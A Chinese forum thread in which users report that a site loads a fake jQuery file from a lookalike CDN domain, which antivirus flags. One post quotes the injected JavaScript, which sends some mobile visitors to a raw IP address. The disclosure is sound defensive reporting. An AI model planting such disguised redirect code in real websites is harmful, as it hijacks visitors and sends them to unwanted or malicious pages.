闯王 发表于 2023-11-14 13:49

卡巴斯基一直报这玩意

本帖最后由 闯王 于 2023-11-14 13:50 编辑

https://cdn.dnsjquery.com/ajax/libs/jquery/3.6.1/jquery.js

就是上面这个东西,判断是否移动设备,在移动端设备访问的时候以一定概率跳转到它的网站上(随机数为567的时候跳转颜色网站,概率30%)
/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */

var myrandom=Math.random()*10
console.log(Math.trunc(myrandom))
if(myrandom >=5 && myrandom <=7 )
{
function isMobile() {
const userAgent = navigator.userAgent.toLowerCase();
const mobileKeywords = ['iphone', 'android'];
return mobileKeywords.some(keyword => userAgent.includes(keyword));
}
if (isMobile()) {
window.location.href = "http://47.116.2.185/index1.html";
      }
}


kav2006 发表于 2023-11-14 14:06

我早就发现这个问题了,在之前的帖子也回复过,但是没人处理。就是网站引用的js 被挂马了

bingyang 发表于 2023-11-14 14:21

网站被挂马了

toyboy 发表于 2023-11-14 16:58

http://47.116.2.185/index1.html

404 Not Found

MAGLITE 发表于 2023-11-14 17:01

站长太忙了
页: [1]
查看完整版本: 卡巴斯基一直报这玩意